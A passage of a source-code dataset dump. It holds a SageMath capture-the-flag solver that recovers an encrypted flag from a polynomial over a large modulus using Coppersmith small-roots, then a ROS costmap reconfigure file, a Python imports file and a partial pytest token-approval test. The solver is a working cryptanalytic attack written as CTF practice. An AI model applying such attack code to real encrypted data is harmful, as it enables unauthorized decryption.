hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b28be43846b5cc3d6814460abadf6f86dd8e6f93
| 12,247
|
py
|
Python
|
crypto/Irreducible/solve.sage.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | 5
|
2019-10-04T07:20:37.000Z
|
2021-06-15T21:34:07.000Z
|
crypto/Irreducible/solve.sage.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | null | null | null |
crypto/Irreducible/solve.sage.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | null | null | null |
# This file was *autogenerated* from the file solve.sage
from sage.all_cmdline import * # import sage library
_sage_const_1 = Integer(1); _sage_const_0 = Integer(0); _sage_const_8 = Integer(8); _sage_const_0x100 = Integer(0x100); _sage_const_634390332758544863533225908175278820293902247273694738557279808547507605605243060845779162007453421166537998974798267403165147194326220277087481586732434578483984382044909938217885300325454854003592061285530227347443870161489884108156839152026792175883344824312705039432192788282221751953071400637582212565973825187901493157747810534534782538666139623239849108114074769483176190409077525619642607096659163938064917619080979276653346570460907840530820984090762890328670108372635266804760702260308210468824054785225609704744553702749030883759302514419732475353237265623064175672626973021817721830057157554469942016659636665088355223388001385492075532645512044699024856214047179824353294265985131421311264905683919868689468128201121500051333234294495133322269575003178917846613019513055294938676473347834648859092781820455177396655659241350758080943209448657069860156330266182595425071785597749584755392149850520201502359380960953028168070443739303437501159547492090284199748847031233395048565256094155871209024910665765470210489150199890408963339584734607161548145948117870587381417761820782604845894085527393326561552255285252183775565605213613851508658068982312542266745844181179298681513229587620814341358546533028653639404063795287 = Integer(634390332758544863533225908175278820293902247273694738557279808547507605605243060845779162007453421166537998974798267403165147194326220277087481586732434578483984382044909938217885300325454854003592061285530227347443870161489884108156839152026792175883344824312705039432192788282221751953071400637582212565973825187901493157747810534534782538666139623239849108114074769483176190409077525619642607096659163938064917619080979276653346570460907840530820984090762890328670108372635266804760702260308210468824054785225609704744553702749030883759302514419732475353237265623064175672626973021817721830057157554469942016659636665088355223388001385492075532645512044699024856214047179824353294265985131421311264905683919868689468128201121500051333234294495133322269575003178917846613019513055294938676473347834648859092781820455177396655659241350758080943209448657069860156330266182595425071785597749584755392149850520201502359380960953028168070443739303437501159547492090284199748847031233395048565256094155871209024910665765470210489150199890408963339584734607161548145948117870587381417761820782604845894085527393326561552255285252183775565605213613851508658068982312542266745844181179298681513229587620814341358546533028653639404063795287); _sage_const_340380243606881896055357150852081704009261841875676917168392901542600158697498147470022070926431538973355986319287899336229347984195186235609026994105880539538744385947844002522392600799291123746788307149592202054293542184751426393921386667054337702133605244653857105200184382184314615395089410386837949991463800365032817120047755695213056898358351029050988904465534196504370647057949656041980136093701111673261061362088910159060407069111138148213911184934346030355108818623873406179170643354109575921906069827319176721391148784597815966696725312993112836679580986301915869285153640258800257520387666039815335882682501846764931914005501272890703979399028303286591392295335090668894416007738581234420317705017602185505796952708538056986900927227219010924990687749054202059611121098007196600311153002496535400678852675523633611129751070279014895782742719230859241266618078080591783496208454660896116326742901368549176280950824427940866633550004165659591555809355785250595678271198087444 = Integer(340380243606881896055357150852081704009261841875676917168392901542600158697498147470022070926431538973355986319287899336229347984195186235609026994105880539538744385947844002522392600799291123746788307149592202054293542184751426393921386667054337702133605244653857105200184382184314615395089410386837949991463800365032817120047755695213056898358351029050988904465534196504370647057949656041980136093701111673261061362088910159060407069111138148213911184934346030355108818623873406179170643354109575921906069827319176721391148784597815966696725312993112836679580986301915869285153640258800257520387666039815335882682501846764931914005501272890703979399028303286591392295335090668894416007738581234420317705017602185505796952708538056986900927227219010924990687749054202059611121098007196600311153002496535400678852675523633611129751070279014895782742719230859241266618078080591783496208454660896116326742901368549176280950824427940866633550004165659591555809355785250595678271198087444); _sage_const_30 = Integer(30)
n = _sage_const_634390332758544863533225908175278820293902247273694738557279808547507605605243060845779162007453421166537998974798267403165147194326220277087481586732434578483984382044909938217885300325454854003592061285530227347443870161489884108156839152026792175883344824312705039432192788282221751953071400637582212565973825187901493157747810534534782538666139623239849108114074769483176190409077525619642607096659163938064917619080979276653346570460907840530820984090762890328670108372635266804760702260308210468824054785225609704744553702749030883759302514419732475353237265623064175672626973021817721830057157554469942016659636665088355223388001385492075532645512044699024856214047179824353294265985131421311264905683919868689468128201121500051333234294495133322269575003178917846613019513055294938676473347834648859092781820455177396655659241350758080943209448657069860156330266182595425071785597749584755392149850520201502359380960953028168070443739303437501159547492090284199748847031233395048565256094155871209024910665765470210489150199890408963339584734607161548145948117870587381417761820782604845894085527393326561552255285252183775565605213613851508658068982312542266745844181179298681513229587620814341358546533028653639404063795287
a = [2010531849014807811244967452550596954170482017366963197179967378341950609877035976926266565045201327954545531976193764010455839462214548125935809831930906217583985144556304000068160287029349520299624614834820614980577571769037952453503904780829945902428777023113240343971798255994725602060032080395165249252118203994597989803323008689445738726958316299382843046151379404223038378306103446946814242282508452762994709381767737020005234626341549245619459606877141219867068035139077696570326679785895561991386159948678734295510819110097778649467477026525304571866935401916133281154191128385628924010309987916939562860944L, 1957728714073561025444049862451037169274105569943303306791307265284902155776766730138921929047515116875064204422846355574659846986380481554081304450196740182791655899138238300809181952819798719334682652843468093290967739253183715122445807216087701696532328794077633906535348772595420658664669631932240904104526705654085471965081124710424408313188658654269997323823344665013620792807904922448804892707022585395887233208782695904651548515039238103159738011670910000843881190838705734405508263817080572349269917899711814025839567038759017324204719274094925235488251139390100879986034431576582233053100042459754056721328L, 14633594144788739927026894977043979066159638374614447093714156045032057824085101117749372536628815108406925045960292833889218109370315352739477423094983344593380872607721265115065643999704623781354837795392356213963728183408707784710730841593835763297179871187214115888599867994386663070192739880387913810433876985756438937656886777305157527713862265106976080853776807701851418468867892514187995330270398511480196219270778795626752449173027453951938908052889586748615014028198921819259360961682079672852871334097972121537195761276233238326097040304123395264448294169902168081701555285410252628418576329612032743822656L, 30929744237761925275779619637228756909273275228972750977833842275681869086116340969076439846499218017534226291524942385308707563078786626236494596208894970526069269519418649985914398929328741202595762382734225557440059310318524491309260192804536315362985304213401749160044798809875645571955587602983295393590560174552439433974878741218152614497192789702930801977104493818899157936635075060547744352678118768665244767760543756729845753210746035948226910923229144631648461693219879044167508144465542745778725708145285938143335905860453429086530916135708582690647044249742625720553034307280926958493635056715199618948255L, 2736997387699905351668085980997857573537883215020849824031924382478774724354893995582443335957215604292871013310245658357276267388909986882514451123356268477738475383061844694003338924573791710273211430026022500105647755368859353564374828513889089668535501312143014776864228173945699898966966038577097286471416334498369191331733489012787167892563032372216318024758127709506640721164446544052940686946306349794324428219841864315805616481940362854692253412646097863219862500643764207829111058334685461395519153197770408604824434255674531095991762385404626964401461278191533996440553437636464337965673618849007875748335L, 10138853565592015105460349391824630041349301782955976098151452306601942132992939175760470023847252810478352651882007892229451212768112510921391523329570278170494870876172217466315580044877833446334271653752234487178668899095662633037386537755400120340774679512511394968940579253203708322989582269535699783805149252869744882348496667131258430507421739826457730921423784937910140043747774058768492858149057261161659337718982175323365787375263797780804084574556765866310528969548165524609215368165479974192219642551585795556561156118984108183820103401463673813278192939446726782671210175154550709092578352646292397148695L, 2705289074015868556495876116122034778419482000649816956762698090011178447945290332666191814319874892445968692874942151089591538419047230200250130537360543283500874358388021915731700617342644182770696524538105308332591350174568506946526824286428046901094088052777906597555877816895182575842954717583238668932627003103765051957703661539717838484368046549711819678603390137497777321547780661184734527888712946398571068227748473417068659665911823063293642880605380887346392751759275385749252422803713137333278390979373269487140753614904363290566511431042967664299521308911436294095767853420126884677960454179566849947911L, 32255664078313921987277419379096806499011603256554039416290254881793020312519926307527921519979634759557831587219841583766017314943677339008869153819229665461685884451017771930587031347299979562059056085002308162520099267712782084503108260647689403237182131017247206190667209194033633402951334606382904942572174996868542183284017683810713524436317515257997599861313148353141712577673062302740163653303306191436502370962209436722553506417051271738096885658139454947332529520834452755246989316977226513412490778345898961230442523579466541698292139280562767818413666760816022286886124820077034842996907566401674181684192L]
enc = _sage_const_340380243606881896055357150852081704009261841875676917168392901542600158697498147470022070926431538973355986319287899336229347984195186235609026994105880539538744385947844002522392600799291123746788307149592202054293542184751426393921386667054337702133605244653857105200184382184314615395089410386837949991463800365032817120047755695213056898358351029050988904465534196504370647057949656041980136093701111673261061362088910159060407069111138148213911184934346030355108818623873406179170643354109575921906069827319176721391148784597815966696725312993112836679580986301915869285153640258800257520387666039815335882682501846764931914005501272890703979399028303286591392295335090668894416007738581234420317705017602185505796952708538056986900927227219010924990687749054202059611121098007196600311153002496535400678852675523633611129751070279014895782742719230859241266618078080591783496208454660896116326742901368549176280950824427940866633550004165659591555809355785250595678271198087444
P = PolynomialRing(Zmod(n), implementation='NTL', names=('x',)); (x,) = P._first_ngens(1)
f = -enc
for i in range(_sage_const_8 ):
f += a[i] * x**i
f /= a[-_sage_const_1 ]
print Integer(f.small_roots(X=_sage_const_0x100 **_sage_const_30 )[_sage_const_0 ]).hex().decode('hex')
| 720.411765
| 4,960
| 0.983588
| 119
| 12,247
| 100.840336
| 0.428571
| 0.0105
| 0.001667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.955559
| 0.007839
| 12,247
| 16
| 4,961
| 765.4375
| 0.032014
| 0.006042
| 0
| 0
| 1
| 0
| 0.000575
| 0
| 0
| 1
| 0.000411
| 0
| 0
| 0
| null | null | 0
| 0.090909
| null | null | 0.090909
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2941ee4f320aad7f403ab15068d28550accf5a9
| 10,621
|
py
|
Python
|
RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/costmap_converter/cfg/CostmapToDynamicObstaclesConfig.py
|
QianheYu/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T03:31:15.000Z
|
2022-03-11T03:31:15.000Z
|
RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/costmap_converter/cfg/CostmapToDynamicObstaclesConfig.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/costmap_converter/cfg/CostmapToDynamicObstaclesConfig.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
## *********************************************************
##
## File autogenerated for the costmap_converter package
## by the dynamic_reconfigure package.
## Please do not edit.
##
## ********************************************************/
from dynamic_reconfigure.encoding import extract_params
inf = float('inf')
config_description = {'upper': 'DEFAULT', 'lower': 'groups', 'srcline': 245, 'name': 'Default', 'parent': 0, 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'cstate': 'true', 'parentname': 'Default', 'class': 'DEFAULT', 'field': 'default', 'state': True, 'parentclass': '', 'groups': [], 'parameters': [{'srcline': 290, 'description': 'Foreground detection: Learning rate of the slow filter', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'alpha_slow', 'edit_method': '', 'default': 0.3, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Foreground detection: Learning rate of the fast filter', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'alpha_fast', 'edit_method': '', 'default': 0.85, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Foreground detection: Weighting coefficient between a pixels value and the mean of its nearest neighbors', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'beta', 'edit_method': '', 'default': 0.85, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Foreground detection: Minimal difference between the fast and the slow filter to recognize a obstacle as dynamic', 'max': 255, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_sep_between_slow_and_fast_filter', 'edit_method': '', 'default': 80, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Foreground detection: Minimal value of the fast filter to recognize a obstacle as dynamic', 'max': 255, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_occupancy_probability', 'edit_method': '', 'default': 180, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Foreground detection: Maximal mean value of the nearest neighbors of a pixel in the slow filter', 'max': 255, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_occupancy_neighbors', 'edit_method': '', 'default': 80, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Foreground detection: Size of the structuring element for the closing operation', 'max': 10, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'morph_size', 'edit_method': '', 'default': 1, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Include static obstacles as single-point polygons', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'publish_static_obstacles', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal distance between centers of two blobs to be considered as seperate blobs', 'max': 300.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_distance_between_blobs', 'edit_method': '', 'default': 10.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on number of pixels', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_area', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal number of pixels a blob consists of', 'max': 300, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_area', 'edit_method': '', 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blob detection: Maximal number of pixels a blob consists of', 'max': 300, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_area', 'edit_method': '', 'default': 300, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on their circularity', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_circularity', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal circularity value (0 in case of a line)', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_circularity', 'edit_method': '', 'default': 0.2, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Maximal circularity value (1 in case of a circle)', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_circularity', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on their inertia ratio', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_inertia', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal inertia ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_inertia_ratio', 'edit_method': '', 'default': 0.2, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Maximal inertia ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_inertia_ratio', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on their convexity (Blob area / area of its convex hull)', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_convexity', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimum convexity ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_convexity', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Maximal convexity ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_convexity', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Tracking: Time for one timestep of the kalman filter', 'max': 3.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'dt', 'edit_method': '', 'default': 0.2, 'level': 0, 'min': 0.1, 'type': 'double'}, {'srcline': 290, 'description': 'Tracking: Maximum distance between two points to be considered in the assignment problem', 'max': 150.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'dist_thresh', 'edit_method': '', 'default': 20.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Tracking: Maximum number of frames a object is tracked while it is not seen', 'max': 10, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_allowed_skipped_frames', 'edit_method': '', 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Tracking: Maximum number of Points in a objects trace', 'max': 100, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_trace_length', 'edit_method': '', 'default': 10, 'level': 0, 'min': 1, 'type': 'int'}], 'type': '', 'id': 0}
min = {}
max = {}
defaults = {}
level = {}
type = {}
all_level = 0
#def extract_params(config):
# params = []
# params.extend(config['parameters'])
# for group in config['groups']:
# params.extend(extract_params(group))
# return params
for param in extract_params(config_description):
min[param['name']] = param['min']
max[param['name']] = param['max']
defaults[param['name']] = param['default']
level[param['name']] = param['level']
type[param['name']] = param['type']
all_level = all_level | param['level']
| 287.054054
| 9,740
| 0.687412
| 1,398
| 10,621
| 5.110157
| 0.12804
| 0.070549
| 0.047312
| 0.072788
| 0.755879
| 0.75238
| 0.74944
| 0.737682
| 0.737682
| 0.717945
| 0
| 0.029722
| 0.097166
| 10,621
| 36
| 9,741
| 295.027778
| 0.715299
| 0.037661
| 0
| 0
| 1
| 1.625
| 0.697617
| 0.257378
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a251d2ec0a2233b42481daef96e8fcd29f195be8
| 145
|
py
|
Python
|
src/credo_cf/classification/__init__.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
src/credo_cf/classification/__init__.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
src/credo_cf/classification/__init__.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | 3
|
2020-06-19T15:41:19.000Z
|
2020-06-29T12:47:05.000Z
|
from credo_cf.classification.artifact import *
from credo_cf.classification.preprocess import *
from credo_cf.classification.clustering import *
| 36.25
| 48
| 0.855172
| 18
| 145
| 6.722222
| 0.444444
| 0.223141
| 0.272727
| 0.619835
| 0.512397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082759
| 145
| 3
| 49
| 48.333333
| 0.909774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a268adc5b8b7848ffb5e6631c348ba5eacc1ab13
| 2,403
|
py
|
Python
|
tests/unitary/RewardsOnlyGauge/test_approve.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 217
|
2020-06-24T14:01:21.000Z
|
2022-03-29T08:35:24.000Z
|
tests/unitary/RewardsOnlyGauge/test_approve.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 25
|
2020-06-24T09:39:02.000Z
|
2022-03-22T17:03:00.000Z
|
tests/unitary/RewardsOnlyGauge/test_approve.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 110
|
2020-07-10T22:45:49.000Z
|
2022-03-29T02:51:08.000Z
|
import pytest
@pytest.mark.parametrize("idx", range(5))
def test_initial_approval_is_zero(rewards_only_gauge, accounts, idx):
assert rewards_only_gauge.allowance(accounts[0], accounts[idx]) == 0
def test_approve(rewards_only_gauge, accounts):
rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 10 ** 19
def test_modify_approve(rewards_only_gauge, accounts):
rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
rewards_only_gauge.approve(accounts[1], 12345678, {"from": accounts[0]})
